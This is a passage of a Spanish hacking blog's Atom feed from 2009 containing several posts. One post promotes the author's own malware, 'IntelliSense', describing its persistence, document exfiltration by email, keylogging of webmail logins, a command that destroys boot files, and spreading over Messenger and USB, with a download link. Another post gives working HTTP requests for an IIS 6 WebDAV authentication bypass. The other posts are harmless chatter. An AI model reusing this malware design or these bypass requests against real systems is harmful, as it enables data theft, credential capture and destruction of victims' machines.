original)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span style="font-weight: bold;"&gt;IntelliSense&lt;/span&gt; es una técnica que se me ocurrió para sacar información  y obtener control remoto de una PC o Red enviando ordenes vía web desde cualquier equipo público o privado y cualquier Sistema Operativo con un navegador o cliente FTP.&lt;br /&gt;IntelliSense puede ser aplicado al lenguaje de programación que más nos guste.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Como funciona?&lt;/span&gt;&lt;br /&gt;Al iniciar el programa verificara si se encuentra en una cuenta de  Administrador u otro tipo, dependiendo de la cuenta elegirá donde se copiara y si modificara el registro para el auto inicio, deshabilitado del Safe Mode y otras cosas.&lt;br /&gt;&lt;br /&gt;Una vez realizada la autocopia listara los archivos que se encuentren en Mis Documentos y el Escritorio para enviarlos vía mail (escogí Gmail para la demostración) a nuestra cuenta además de algunos datos de la víctima.&lt;br /&gt;&lt;br /&gt;Luego empezara a leer las ordenes web que se encuentren en un archivo "1.txt" que tengamos alojado en alguna pagina web con el siguiente formato:&lt;br /&gt;&lt;br /&gt; "&lt;span style="font-weight: bold; font-style: italic;"&gt;PC:ORDEN&lt;/span&gt;"&lt;br /&gt;&lt;br /&gt;Donde "&lt;span style="font-style: italic;"&gt;PC&lt;/span&gt;" puede corresponder a la IP pública, IP privada, Nombre de Usuario o Nombre de Usuario de Dominio  para poder enviar la orden a una máquina especifica y si necesitáramos enviarla a todos los PC's se puede usar &lt;span style="font-style: italic;"&gt;ALL&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;"&lt;span style="font-style: italic; font-weight: bold;"&gt;ORDEN&lt;/span&gt;" se refiere a la orden que enviamos a la PC el diseño actual cuenta con&lt;br /&gt;4 ordenes:&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    CAPTURA&lt;/span&gt;: que envía vía mail una captura de pantalla.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    KILL&lt;/span&gt;: que reemplaza los archivos principales de arranque para evitar el inicio de Windows y reinicia el equipo.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    KEYLOG&lt;/span&gt;: que envía los datos sustraídos (si los hubiera) de cuentas de correo (páginas en español) como GMAIL, Windows Live Messenger, Hotmail ,Yahoo u otras que especifiquemos.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    default&lt;/span&gt;: que envía por FTP uno, varios o todos los archivos que queramos utilizando &lt;span style="font-style: italic;"&gt;Winrar&lt;/span&gt; para comprimirlos, si por ejemplo pusiéramos en la orden:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"*.*"&lt;/span&gt; enviara todos los archivos listados&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"*.JPG"&lt;/span&gt; enviara solo los archivos con dicha extensión.&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"documentos.doc"&lt;/span&gt; enviara dicho archivo.&lt;br /&gt;&lt;br /&gt;Tb cuenta con métodos de protección matando el proceso del Task Manager y si se ingresa a la carpeta donde se encuentre activara la protección igual que con "&lt;span style="font-weight: bold;"&gt;KILL&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;El keylogger solo se activa cuando se ingresa a las páginas que especifiquemos  y cada media hora si hay datos que enviar lo hará vía mail.&lt;br /&gt;&lt;br /&gt;En la propagación por Messenger lista todos los contactos que se encuentren en la cuenta actual e ira enviando un link de descarga y una copia de si mismo comprimida a cada contacto, si el contacto esta &lt;span style="font-weight: bold;"&gt;"conectado" recibirá el link de descarga mas la copia comprimida, en otra caso recibirá solo el link de descarga.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;En la replicación por &lt;span style="font-weight: bold;"&gt;USB&lt;/span&gt; listara las carpetas de la unidad USB y las ocultara para luego crear copias de sí mismo con los nombres de dichas carpetas (&lt;span style="font-style: italic;"&gt;ya se ha visto en replicación USB&lt;/span&gt;).&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;a href="http://www.4shared.com/file/106746397/2040d87e/IntelliSense.html"&gt;Aqui esta el link&lt;/a&gt; del proyecto, para que lo reviseis tranquilamente. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/cool.gif" alt="::)" title="::)" align="bottom" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-1404187447939119952?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/1404187447939119952/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/una-pequena-perla-intellisense.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1404187447939119952'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1404187447939119952'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/una-pequena-perla-intellisense.html' title='Una pequeña perla: IntelliSense'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-1005100903648446975</id><published>2009-05-18T21:31:00.004+02:00</published><updated>2009-05-18T21:54:36.115+02:00</updated><title type='text'>Microsoft y su Servidor Web: ZAS</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img alt="http://www.hermanotemblon.com/wp-images/iis6.jpg" src="http://www.hermanotemblon.com/wp-images/iis6.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;div style="text-align: left;"&gt;Nada mas enterarme fui a probarlo: vulnerabilidad de las que hasta un &lt;span style="font-size:85%;"&gt;niño pequeño &lt;/span&gt;sabe usar en el &lt;span style="font-weight: bold;"&gt;IIS 6 &lt;/span&gt;(solo si incluye el modulo WebDAV) de &lt;span style="font-weight: bold;"&gt;Microsoft &lt;/span&gt;(por si alguien no lo conoce, el "&lt;span style="font-style: italic;"&gt;Apache&lt;/span&gt;" del tito Bill.&lt;br /&gt;&lt;br /&gt;Afecta a los directorios protegidos, en vez de darnos un bello error &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;b&gt;401 Unauthorized&lt;/b&gt;&lt;/span&gt;, nos escupiran el archivo "&lt;span style="font-style: italic;"&gt;supuestamente&lt;/span&gt;" protegido. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/smiley.gif" alt=":)" title=":)" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;Veamos como se hace esto, siguiendo el articulo que publicaba &lt;a href="http://www.milw0rm.com/author/113"&gt;kcope&lt;/a&gt; hace apenas unos dias en este &lt;a href="http://www.milw0rm.com/exploits/8704"&gt;documento&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;Todo esto se basa en como maneja el IIS el caracter unicode "%c0%af".&lt;br /&gt;&lt;br /&gt;Al hacer una peticion normal, del tipo:&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;GET /protected/protected.zip HTTP/1.1&lt;br /&gt;Connection: close&lt;br /&gt;Host: servername&lt;/blockquote&gt;&lt;br /&gt;Recibiriamos un error &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;b&gt;401 Unauthorized&lt;/b&gt;&lt;/span&gt;.  Normal, es una peticion comun. Probemos otra cosa.&lt;br /&gt;&lt;br /&gt;Hacemos una peticion con el caracter unicode del que hablabamos antes: &lt;img src="http://foro.elhacker.net/Smileys/cowboy/wink.gif" alt=";)" title=";)" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;GET /prot%c0%afected/protected.zip HTTP/1.1&lt;br /&gt;Connection: close&lt;br /&gt;Host: servername&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;b&gt;401 Unauthorized.&lt;/b&gt;&lt;/span&gt; Bien, parece que un servidor IIS 6 en condiciones normales maneja bien el caracter maldito.&lt;img src="http://foro.elhacker.net/Smileys/cowboy/shocked.gif" alt=":o" title=":o" align="bottom" /&gt;  Y que tal WebDAV? Probemos:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;GET /prot%c0%afected/protected.zip HTTP/1.1&lt;br /&gt;Translate: f &lt;span style="font-style: italic;"&gt;&lt;--Con esto indicamos que la peticion sea manejada con WebDAV&lt;/span&gt;&lt;br /&gt;Connection: close&lt;br /&gt;Host: servername&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Zas! &lt;/span&gt;Ahi tenemos nuestro bonito archivo protected.zip, con todas las claves del gobierno (teoricamente ).&lt;br /&gt;&lt;br /&gt;Nos lo devuelve limpiamente. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/aplaudir.gif" alt=";-)" title=";-)" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-1005100903648446975?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/1005100903648446975/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/microsoft-y-su-servidor-web-zas.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1005100903648446975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1005100903648446975'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/microsoft-y-su-servidor-web-zas.html' title='Microsoft y su Servidor Web: ZAS'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-5961173030187239744</id><published>2009-05-16T14:33:00.009+02:00</published><updated>2009-05-16T16:03:22.499+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='moncloa'/><category scheme='http://www.blogger.com/atom/ns#' term='dorks'/><category scheme='http://www.blogger.com/atom/ns#' term='quinceañeros'/><category scheme='http://www.blogger.com/atom/ns#' term='fotolog'/><title type='text'>Quinceañeros en la moncloa? Wtf?!</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img style="width: 339px; height: 214px;" alt="http://www.crackmen.com/blog/wp-content/uploads/2009/04/mala-ortografia.gif" src="http://www.crackmen.com/blog/wp-content/uploads/2009/04/mala-ortografia.gif" /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Parece ser que con la clara "&lt;span style="font-style: italic;"&gt;recesion economica&lt;/span&gt;" de esta temporada, en la moncloa se estan viendo obligados a &lt;span style="font-weight: bold;"&gt;contratar personal mas joven &lt;/span&gt;para redactar sus documentos, como pude comprobar esta mañana.... &lt;img src="http://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" title=":laugh:" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;No hay mas que ver la foto para entenderlo:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://img35.imageshack.us/img35/8303/moncloaquinceaeros.jpg" target="_blank"&gt;&lt;img src="http://img35.imageshack.us/img35/8303/moncloaquinceaeros.th.jpg" alt="Desde luego... que mala es la pobreza" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:78%;"&gt;Clica para aumentar el tamaño&lt;/span&gt;. &lt;span style="font-size:78%;"&gt;Viva la hortográfhia.&lt;/span&gt;&lt;img style="width: 29px; height: 20px;" src="http://foro.elhacker.net/Smileys/cowboy/aplaudir.gif" alt=";-)" title=";-)" align="bottom" /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;a href="http://www.google.com/search?hl=es&amp;amp;safe=off&amp;amp;q=site%3Ala-moncloa.es+filetype%3Apdf&amp;amp;btnG=Buscar&amp;amp;lr="&gt;Podeis comprobarlo tambien en este link&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;¿No os recuerda a aquella vieja &lt;span style="font-style: italic;"&gt;""&lt;/span&gt;&lt;span style="font-style: italic;"&gt;gloria&lt;/span&gt;&lt;span style="font-style: italic;"&gt;"" &lt;/span&gt;llamada &lt;span style="font-weight: bold;"&gt;Fotolog&lt;/span&gt;? &lt;/span&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/grin.gif" alt=";D" title=";D" align="bottom" /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;¿Aquellos quinceañeros que parece que la tecla Bloq May se les pegaba y despegaba del teclado a ratos?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Desde luego es una muestra mas del &lt;span style="font-weight: bold;"&gt;poder del tito Google &lt;/span&gt;y de la &lt;span style="font-weight: bold;"&gt;pobreza del gobierno Español..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_-dOA210g16k/Sg60uv9yXJI/AAAAAAAAACc/8LHBhZjqFpw/s1600-h/shula.jpg"&gt;&lt;img style="cursor: pointer; width: 400px; height: 132px;" src="http://1.bp.blogspot.com/_-dOA210g16k/Sg60uv9yXJI/AAAAAAAAACc/8LHBhZjqFpw/s400/shula.jpg" alt="" id="BLOGGER_PHOTO_ID_5336401323723218066" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;PD: Vale, reconozco que si abrimos los enlaces los PDFs estan bien. Conclusion: Google es maligno &lt;img src="http://foro.elhacker.net/Smileys/cowboy/rolleyes.gif" alt=":rolleyes:" border="0" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-5961173030187239744?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/5961173030187239744/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/quinceaneros-en-la-moncloa-wtf.html#comment-form' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/5961173030187239744'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/5961173030187239744'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/quinceaneros-en-la-moncloa-wtf.html' title='Quinceañeros en la moncloa? Wtf?!'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_-dOA210g16k/Sg60uv9yXJI/AAAAAAAAACc/8LHBhZjqFpw/s72-c/shula.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-61691615760393477</id><published>2009-05-15T20:43:00.004+02:00</published><updated>2009-05-15T21:07:17.538+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kylin'/><category scheme='http://www.blogger.com/atom/ns#' term='EE.UU.'/><category scheme='http://www.blogger.com/atom/ns#' term='S.O'/><category scheme='http://www.blogger.com/atom/ns#' term='ciberguerra'/><category scheme='http://www.blogger.com/atom/ns#' term='china'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>China y EE.UU: Sin piedad</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img style="width: 290px; height: 221px;" alt="http://3.bp.blogspot.com/_UaX2MT8gC_0/SQ3n3rNdWHI/AAAAAAAAAAc/4sppulig9eQ/s400/Kylin.jpg" src="http://3.bp.blogspot.com/_UaX2MT8gC_0/SQ3n3rNdWHI/AAAAAAAAAAc/4sppulig9eQ/s400/Kylin.jpg" /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-weight: bold;"&gt;Esta mañana leia en Neoteo &lt;/span&gt;un articulo sobre la ciberguerra que se traen China y EE.UU: entre intento de hackeo y intento de DOS, parece que a los chinos les queda tiempo para &lt;span style="font-weight: bold;"&gt;hacer un S.O. completamente nuevo y invulnerable.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Por el momento, parece que se llama "&lt;span style="font-style: italic; font-weight: bold;"&gt;Kylin&lt;/span&gt;", como el &lt;span style="font-style: italic;"&gt;Quilin&lt;/span&gt;, un bicho mitologico que protege a los puros de corazon (&lt;img src="http://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" title=":laugh:" align="bottom" /&gt;)&lt;br /&gt;&lt;br /&gt;Su supuesta invulnerabilidad se basa en &lt;span&gt;la&lt;/span&gt;&lt;span style="font-style: italic;"&gt; &lt;/span&gt;premisa de que&lt;span style="font-style: italic;"&gt;"todos los ataques que hay hoy en dia son para UNIK, Linux o Windows"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Mal van por ese camino, si es un S.O dedicado a pegarse con EE.UU. no tardara mucho en aparecer algun bug... y entonces.. ZAS!!&lt;br /&gt;&lt;br /&gt;Aun me quede con la duda de si esta hecho de cero, o se basan en BSD, Linux, Win (?).. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/rolleyes.gif" alt=":rolleyes:" title=":rolleyes:" align="bottom" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-61691615760393477?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/61691615760393477/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/esta-manana-leia-en-neoteo-un-articulo.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/61691615760393477'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/61691615760393477'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/esta-manana-leia-en-neoteo-un-articulo.html' title='China y EE.UU: Sin piedad'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_UaX2MT8gC_0/SQ3n3rNdWHI/AAAAAAAAAAc/4sppulig9eQ/s72-c/Kylin.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-3251524373223341676</id><published>2009-05-13T21:58:00.003+02:00</published><updated>2009-05-13T22:05:28.841+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugs'/><category scheme='http://www.blogger.com/atom/ns#' term='sun'/><category scheme='http://www.blogger.com/atom/ns#' term='democracia'/><category scheme='http://www.blogger.com/atom/ns#' term='openoffice'/><category scheme='http://www.blogger.com/atom/ns#' term='fix'/><title type='text'>OpenOffice: democracia al fixear bugs</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img style="width: 273px; height: 168px;" alt="http://www.thevarguy.com/wp-content/uploads/2009/03/openoffice-logo.png" src="http://www.thevarguy.com/wp-content/uploads/2009/03/openoffice-logo.png" /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;No todos estan de acuerdo con la democracia, pero desde luego en OpenOffice la pracican al máximo: &lt;span style="font-weight: bold;"&gt;los bugs se arreglan o no dependiendo de si son votados&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; (curioso, añadieron soporte anti-aliasing, por si te pone añadir imagenes a tus documentos, pero aun no arreglan el horrible bug (&lt;img src="http://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" title=":laugh:" align="bottom" /&gt;) que no permite escribir parrafos de &lt;span style="font-weight: bold;"&gt;65.534 caracteres&lt;/span&gt;. &lt;span style="font-style: italic;"&gt;Terrible&lt;/span&gt;.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Desde luego, esto si que es una forma de implicar a la gente en el proyecto &lt;img src="http://foro.elhacker.net/Smileys/cowboy/aplaudir.gif" alt=";-)" title=";-)" align="bottom" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-3251524373223341676?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/3251524373223341676/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/openoffice-democracia-al-fixear-bugs.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/3251524373223341676'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/3251524373223341676'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/openoffice-democracia-al-fixear-bugs.html' title='OpenOffice: democracia al fixear bugs'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-1535306147002100174</id><published>2009-05-12T23:37:00.004+02:00</published><updated>2009-05-13T00:00:50.083+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ladrones'/><category scheme='http://www.blogger.com/atom/ns#' term='pobre'/><category scheme='http://www.blogger.com/atom/ns#' term='sabio'/><category scheme='http://www.blogger.com/atom/ns#' term='JcF'/><title type='text'>El sabio pobre</title><content type='html'>&lt;div style="text-align: left;"&gt;&lt;div style="text-align: center;"&gt;&lt;img style="width: 232px; height: 159px;" alt="http://www.cocina.org/wp-content/uploads/hierbas.jpg" src="http://www.cocina.org/wp-content/uploads/hierbas.jpg" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold; font-style: italic;font-family:lucida grande;font-size:100%;"  &gt;"  Cuentan de un sabio, que un día&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-style: italic;font-size:100%;" &gt;tan pobre y mísero estaba,&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-size:100%;" &gt;que sólo se sustentaba&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-size:100%;" &gt;de unas yerbas que cogía&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-size:100%;" &gt;«¿Habrá otro», entre sí decía,                    &lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-size:100%;" &gt;«más pobre y triste que yo?»&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-size:100%;" &gt;Y cuando el rostro volvió,&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-size:100%;" &gt;halló la respuesta, viendo&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-size:100%;" &gt;que iba otro sabio cogiendo&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-size:100%;" &gt;las hojas que él arrojó. "                        &lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="font-family: monospace;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;Escribiendo este blog a veces me sentia como el primero.. siempre tomando material de los grandes.. cual fue mi sorpresa al ver que un blog por ahi se dedica a robar material mio.. siempr ehay alguien que esta peor que tu...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-1535306147002100174?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/1535306147002100174/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/el-sabio-pobre.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1535306147002100174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1535306147002100174'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/el-sabio-pobre.html' title='El sabio pobre'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-2690643341670681073</id><published>2009-05-05T22:48:00.006+02:00</published><updated>2009-05-06T00:07:13.056+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cronos'/><category scheme='http://www.blogger.com/atom/ns#' term='mysql'/><category scheme='http://www.blogger.com/atom/ns#' term='backup'/><category scheme='http://www.blogger.com/atom/ns#' term='shell'/><category scheme='http://www.blogger.com/atom/ns#' term='script'/><title type='text'>Cronos: Arte y Backups SQL</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://fc07.deviantart.com/fs24/f/2007/343/b/9/Cronos_Special_Company_Logo_by_Cannibal_Hyper_Tails.png"&gt;&lt;img style="cursor: pointer; width: 331px; height: 247px;" src="http://fc07.deviantart.com/fs24/f/2007/343/b/9/Cronos_Special_Company_Logo_by_Cannibal_Hyper_Tails.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;&lt;/span&gt;Os presento mi último trabajo: un script de backups mysql, llamado &lt;span style="color: rgb(51, 51, 255); font-weight: bold;"&gt;Cronos&lt;/span&gt;, que solo debereis de añadir a las crontabs para que cuide de vuestras dbs.&lt;br /&gt;&lt;br /&gt;Elimina los backups que tengan mas de 30 dias de antigüedad, aparte de comprimirlo todo en .tgz&lt;span style="font-weight: bold;"&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt; Además, como lo uso en un servidor compartido, cuida los permisos del directorio para que nadie pueda leer vuestros backups.&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Para configurarlo&lt;span style="font-weight: bold;"&gt;, &lt;/span&gt;solo teneis que colocar vuestro usuario y password mysql en el script, las dbs que deseeis, los directorios que os pongan, y a disfrutar :D&lt;br /&gt;&lt;br /&gt;En poco os dejare la version que envia los archivos por mail y ftp. Si modificais esta version, me gustaria verla :)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/melyjm8zxu"&gt;&lt;span 